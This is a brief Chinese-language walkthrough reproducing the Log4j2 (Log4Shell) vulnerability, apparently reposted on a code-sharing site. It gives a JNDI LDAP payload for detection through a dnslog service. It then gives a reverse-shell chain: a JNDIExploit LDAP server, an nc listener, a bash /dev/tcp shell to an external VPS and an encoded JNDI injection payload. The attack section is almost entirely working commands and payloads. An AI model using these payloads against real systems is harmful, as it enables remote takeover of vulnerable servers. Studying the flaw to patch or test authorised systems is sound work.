Log4j2漏洞復現


二、漏洞復現

2.1 使用DNLOG平台查看回顯

可以使用相關的dnslog平台查看,也可以使用burp自帶的dnslog進行查看,我這里使用的是 http://dnslog.cn/

${jndi:ldap://rbmanr.dnslog.cn/exp} 有回顯,說明存在該漏洞

 2.2 反彈shell

1、首先起一個ldap服務,IP為接收shell的地址。

 java -jar JNDIExploit-1.3-SNAPSHOT.jar -i 139.198.xx.xx

 2、在VPS上開啟NC監聽

nc -lvvp 1000

 

 3、使用bash命令反彈shell

bash -i >& /dev/tcp/139.198.xx.xx/1000 0>&1  //,這里需要先base64編碼,然后再進行兩次url編碼。

${jndi:ldap://VPSIP:1389/TomcatBypass/Command/Base64/YmFzaCAtaSsfqwA%252BJiAvzkuMTk4LjEyNS45OSgas85OTk5IDA%252BJjE%253D}

 成功反彈shell到我們的VPS上

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM